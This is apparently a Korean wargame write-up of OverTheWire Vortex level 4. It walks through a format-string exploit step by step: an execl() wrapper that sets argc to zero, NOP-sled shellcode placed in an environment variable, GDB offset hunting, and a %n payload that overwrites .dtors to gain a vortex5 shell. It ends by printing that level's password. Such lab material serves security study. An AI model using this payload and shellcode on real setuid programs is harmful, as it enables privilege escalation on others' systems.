Vortex – Level 4

http://www.overthewire.org/wargames/vortex/level4.shtml

// -- andrewg, original author was zen-parse :)
#include <stdlib.h>

int main(int argc, char **argv)
{
        /* Exits with status 0 whenever argc is nonzero.  A normal invocation
         * always carries at least argv[0], so the lines below are only
         * reached when the program is exec'd with an empty argument vector
         * (the writeup below does exactly that with execl()). */
        if(argc) exit(0);
        /* Uncontrolled format string: argv[3] is passed as printf's format,
         * not as an argument, so the data it points to decides which
         * conversions (%x, %n, ...) printf performs.  With argc == 0 there is
         * no argv[3] inside the argument array at all; per the writeup, the
         * value read here comes from the environment block that follows argv.
         * printf is also called without <stdio.h> -- only <stdlib.h> is
         * included above. */
        printf(argv[3]);
        /* Always reports failure once the format string has been printed. */
        exit(EXIT_FAILURE);
}

먼저 if(argc) 검사를 우회해야 하므로 execl() 함수를 이용한다. argv를 비운 채로 실행하면 argc가 0이 되어 exit(0)에 걸리지 않는다. 아래와 같이 간단한 Python 스크립트로 우회할 수 있다.

vortex4@games /tmp/byjjoon $ cat go.py
#!/usr/bin/python
import os
# execl() receives only the path and no argv entries, so the target is
# started with an empty argument vector and the argc check in the C listing
# above is not triggered.  On success control never returns here: execl()
# replaces the current process image.
os.execl('/vortex/level4')
vortex4@games /tmp/byjjoon $ ./go.py 
SHELL=/bin/bashvortex4@games /tmp/byjjoon $ 

우회하여 실행한 결과 환경 변수에 등록된 값이 출력되는 것을 확인할 수 있었다. argc가 0이면 argv 배열 바로 뒤에 환경 변수 포인터들이 이어지므로 argv[3]이 환경 변수 문자열 중 하나를 가리키게 되기 때문이다.
즉, 이 환경 변수를 포맷 스트링으로 이용하여 쉘을 획득할 수 있을 것으로 보인다.

공격하기 전에 먼저 쉘코드를 환경 변수에 등록해 두자. 사용한 쉘코드는 이전 레벨에서 사용했던 것이며, 앞에 NOP를 넉넉히 잡아 100개 넣어 주었다.

vortex4@games /tmp/byjjoon $ export SHELLCODE="`python -c "print '\x90'*100 + '\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80'"`"
vortex4@games /tmp/byjjoon $ ./go.py 
TERM=linuxvortex4@games /tmp/byjjoon $

환경 변수에 쉘코드를 올린 뒤 다시 실행해 보면, 방금 추가한 환경 변수로 인해 이번에는 다른 환경 변수(TERM)가 출력되는 것을 알 수 있다. 이곳에 원하는 포맷 스트링을 넣어 쉘을 획득할 것이다.

이제 OFFSET을 구해 보도록 하자.

vortex4@games /tmp/byjjoon $ export TERM=`python -c "print 'AAAA' + '\x2c\x95\x04\x08' + 'BBBB' + '\x2e\x95\x04\x08' + '%8x'*172 + '%10000c%x%10000c%x' + 'BBB'"`
vortex4@games /tmp/byjjoon $ ./go.py
TERM=AAAA,뷓BBB.뷳f7ff434bf7ff3d8 80483a640139e344001ac80bf7ff4084003829e       0bf7ff434bf7ff438 80482ac       0400127b0400381fd4001afc4       0 80482ac       0 80482cd 804835c       0bf7ff434 804839c 80483cc4000ddd9bf7ff42c40016000       0       0bf7ff529bf7ff5debf7ff66fbf7ff89ebf7ff8aebf7ff8d0bf7ff8ecbf7ff8ffbf7ff90cbf7ffda9bf7ffdbdbf7ffe16bf7ffe2dbf7ffe7dbf7ffe8ebf7ffe9fbf7ffeb0bf7ffebabf7ffec2bf7ffedcbf7ffef1bf7fff01bf7fff0cbf7fff18bf7fff4bbf7fff64bf7fffe3       0      10bfebfbff       6    1000      11      64       3 8048034       4      20       5       6       740000000       8       0       9 80482ac       b     1fa       c     1fb       d     1fa       e     1fa       fbf7ff524       0       0       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  
.
.
.
[생략]
.
.
A804952c
.
.
[생략]
.
.
B804952eBBBvortex4@games /tmp/byjjoon $

%8x를 172개 쓰고 뒤에 더미로 B를 3개 붙여 줬을 때, 마지막에 정확히 0x0804952e 값이 출력되는 것을 확인할 수 있었다.
이제 쉘코드의 위치를 GDB를 통해 확인하여 보도록 하자.

vortex4@games /tmp/byjjoon $ gdb -q /vortex/level4                                                                                                                                
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x8048362
(gdb) r
Starting program: /vortex/level4 

Breakpoint 1, 0x08048362 in main ()
(gdb) x/32wx $esp
0xbf7ff3b0:     0x40139e34      0x4001ac80      0xbf7ff3e8      0x4003829e
0xbf7ff3c0:     0x00000001      0xbf7ff414      0xbf7ff41c      0x080482ac
0xbf7ff3d0:     0x00000000      0x400127b0      0x400381fd      0x4001afc4
0xbf7ff3e0:     0x00000001      0x080482ac      0x00000000      0x080482cd
0xbf7ff3f0:     0x0804835c      0x00000001      0xbf7ff414      0x0804839c
0xbf7ff400:     0x080483cc      0x4000ddd9      0xbf7ff40c      0x40016000
0xbf7ff410:     0x00000001      0xbf7ff51c      0x00000000      0xbf7ff52b
0xbf7ff420:     0xbf7ff5e0      0xbf7ff671      0xbf7ff681      0xbf7ff8b0
(gdb) 
0xbf7ff430:     0xbf7ff8d2      0xbf7ff8e5      0xbf7ff8f2      0xbf7ffd8f
0xbf7ff440:     0xbf7ffd9b      0xbf7ffdf4      0xbf7ffe08      0xbf7ffe58
0xbf7ff450:     0xbf7ffe6f      0xbf7ffe7e      0xbf7ffe8f      0xbf7ffea0
0xbf7ff460:     0xbf7ffeb1      0xbf7ffeba      0xbf7ffed4      0xbf7ffedc
0xbf7ff470:     0xbf7ffee6      0xbf7ffef6      0xbf7fff0b      0xbf7fff17
0xbf7ff480:     0xbf7fff22      0xbf7fff55      0xbf7fff6e      0x00000000
0xbf7ff490:     0x00000010      0xbfebfbff      0x00000006      0x00001000
0xbf7ff4a0:     0x00000011      0x00000064      0x00000003      0x08048034
(gdb) 
0xbf7ff4b0:     0x00000004      0x00000020      0x00000005      0x00000006
0xbf7ff4c0:     0x00000007      0x40000000      0x00000008      0x00000000
0xbf7ff4d0:     0x00000009      0x080482ac      0x0000000b      0x000001fa
0xbf7ff4e0:     0x0000000c      0x000001fa      0x0000000d      0x000001fa
0xbf7ff4f0:     0x0000000e      0x000001fa      0x0000000f      0xbf7ff517
0xbf7ff500:     0x00000000      0x00000000      0x00000000      0x00000000
0xbf7ff510:     0x00000000      0x69000000      0x00363836      0x726f762f
0xbf7ff520:     0x2f786574      0x6576656c      0x4d00346c      0x41504e41
(gdb) 
0xbf7ff530:     0x2f3d4854      0x3a6e616d      0x7273752f      0x636f6c2f
0xbf7ff540:     0x732f6c61      0x65726168      0x6e616d2f      0x73752f3a
0xbf7ff550:     0x68732f72      0x2f657261      0x3a6e616d      0x7273752f
0xbf7ff560:     0x6168732f      0x622f6572      0x74756e69      0x2d736c69
0xbf7ff570:     0x61746164      0x3836692f      0x63702d36      0x6e696c2d
0xbf7ff580:     0x672d7875      0x322f756e      0x2f38312e      0x3a6e616d
0xbf7ff590:     0x7273752f      0x6168732f      0x672f6572      0x642d6363
0xbf7ff5a0:     0x2f617461      0x36383669      0x2d63702d      0x756e696c
(gdb) 
0xbf7ff5b0:     0x6e672d78      0x2e332f75      0x2f362e34      0x3a6e616d
0xbf7ff5c0:     0x6374652f      0x76616a2f      0x6f632d61      0x6769666e
0xbf7ff5d0:     0x7379732f      0x2d6d6574      0x6d2f6d76      0x002f6e61
0xbf7ff5e0:     0x4c454853      0x444f434c      0x90903d45      0x90909090
0xbf7ff5f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf7ff600:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf7ff610:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf7ff620:     0x90909090      0x90909090      0x90909090      0x90909090
(gdb) 
0xbf7ff630:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf7ff640:     0x90909090      0x90909090      0x90909090      0x316a9090
0xbf7ff650:     0x80cd9958      0xc189c389      0xcd58466a      0x520bb080
0xbf7ff660:     0x732f6e68      0x2f2f6868      0xe3896962      0x80cdd189
0xbf7ff670:     0x45485300      0x2f3d4c4c      0x2f6e6962      0x68736162
0xbf7ff680:     0x52455400      0x41413d4d      0x952c4141      0x42420804
0xbf7ff690:     0x952e4242      0x38250804      0x78382578      0x25783825
0xbf7ff6a0:     0x38257838      0x78382578      0x25783825      0x38257838
(gdb) q
The program is running.  Exit anyway? (y or n) y
vortex4@games /tmp/byjjoon $ 

SHELLCODE = 0xbf7ff600

이제 .DTORS 주소를 확인해 보도록 하자.

vortex4@games /tmp/byjjoon $ objdump -s -j .dtors /vortex/level4

/vortex/level4:     file format elf32-i386

Contents of section .dtors:
 8049528 ffffffff 00000000                    ........        
vortex4@games /tmp/byjjoon $ 

.DTORS = 0x08049528

이제 필요한 주소를 모두 구하였으니 계산을 하여 다시 한번 공격을 해보도록 하자.

vortex4@games /tmp/byjjoon $ python -c "print int('f600', 16)"
62976
vortex4@games /tmp/byjjoon $ python -c "print int('1bf7f', 16) - int('f600', 16)"
51583

62976 - 5 - (8 * 172) - 16 = 61579

5 : 'TERM=' 문자열의 길이
8 * 172 : '%8x' 172개가 출력하는 길이
16 : AAAA + BBBB + .dtors 주소 2개(각 4바이트)

vortex4@games /tmp/byjjoon $ export TERM=`python -c "print 'AAAA' + '\x2c\x95\x04\x08' + 'BBBB' + '\x2e\x95\x04\x08' + '%8x'*172 + '%61579c%x%51583c%x' + 'BBB'"`
vortex4@games /tmp/byjjoon $ ./go.py                                                                                                                                              
TERM=AAAA,뷓BBB.뷳f7ff434bf7ff3d8 80483a640139e344001ac80bf7ff4084003829e       0bf7ff434bf7ff438 80482ac       0400127b0400381fd4001afc4       0 80482ac       0 80482cd 804835c       0bf7ff434 804839c 80483cc4000ddd9bf7ff42c40016000       0       0bf7ff529bf7ff5debf7ff66fbf7ff89ebf7ff8aebf7ff8d0bf7ff8ecbf7ff8ffbf7ff90cbf7ffda9bf7ffdbdbf7ffe16bf7ffe2dbf7ffe7dbf7ffe8ebf7ffe9fbf7ffeb0bf7ffebabf7ffec2bf7ffedcbf7ffef1bf7fff01bf7fff0cbf7fff18bf7fff4bbf7fff64bf7fffe3       0      10bfebfbff       6    1000      11      64       3 8048034       4      20       5       6       740000000       8       0       9 80482ac       b     1fa       c     1fb       d     1fa       e     1fa       fbf7ff524       0       0       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
.
.
.
[생략]
.
.
A804952c
.
.
.
[생략]
.
.
.
 B804952eBBBvortex4@games /tmp/byjjoon $ 

주소가 정확히 출력되는 것을 확인했으니, %x를 %n으로 바꾸어 다시 공격해 보자.

vortex4@games /tmp/byjjoon $ export TERM=`python -c "print 'AAAA' + '\x2c\x95\x04\x08' + 'BBBB' + '\x2e\x95\x04\x08' + '%8x'*172 + '%61579c%n%51583c%n' + 'BBB'"`                 
vortex4@games /tmp/byjjoon $ ./go.py                                                                                                                                              
TERM=AAAA,뷓BBB.뷳f7ff434bf7ff3d8 80483a640139e344001ac80bf7ff4084003829e       0bf7ff434bf7ff438 80482ac       0400127b0400381fd4001afc4       0 80482ac       0 80482cd 804835c       0bf7ff434 804839c 80483cc4000ddd9bf7ff42c40016000       0       0bf7ff529bf7ff5debf7ff66fbf7ff89ebf7ff8aebf7ff8d0bf7ff8ecbf7ff8ffbf7ff90cbf7ffda9bf7ffdbdbf7ffe16bf7ffe2dbf7ffe7dbf7ffe8ebf7ffe9fbf7ffeb0bf7ffebabf7ffec2bf7ffedcbf7ffef1bf7fff01bf7fff0cbf7fff18bf7fff4bbf7fff64bf7fffe3       0      10bfebfbff       6    1000      11      64       3 8048034       4      20       5       6       740000000       8       0       9 80482ac       b     1fa       c     1fb       d     1fa       e     1fa       fbf7ff524       0       0       0363836694e414d0048544150616d2f3d752f3a6e6c2f72736c61636f6168732f6d2f65722f3a6e612f72737572616873616d2f65752f3a6e732f7273657261686e69622f6c69747561642d73692f61742d3638366c2d637078756e69756e672d312e322f616d2f38752f3a6e732f7273657261686363672f7461642d36692f61702d3638696c2d632d78756e2f756e672e342e33616d2f36652f3a6e6a2f63742d617661666e6f63732f6769657473796d762d6d6e616d2f4853002f434c4c453d45444f909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909958316ac38980cd466ac189b080cd586e68520b6868732f69622f2fd189e389540080cd3d4d5245
.
.
.
[생략]
.
.
bash: /home/vortex/vortex5/.bashrc: Permission denied
vortex5@games /tmp/byjjoon $ id
uid=507(vortex5) gid=506(vortex4) groups=506(vortex4)
vortex5@games /tmp/byjjoon $ cat /etc/vortex_pass/vortex5
:4VtbC4lr
vortex5@games /tmp/byjjoon $ 
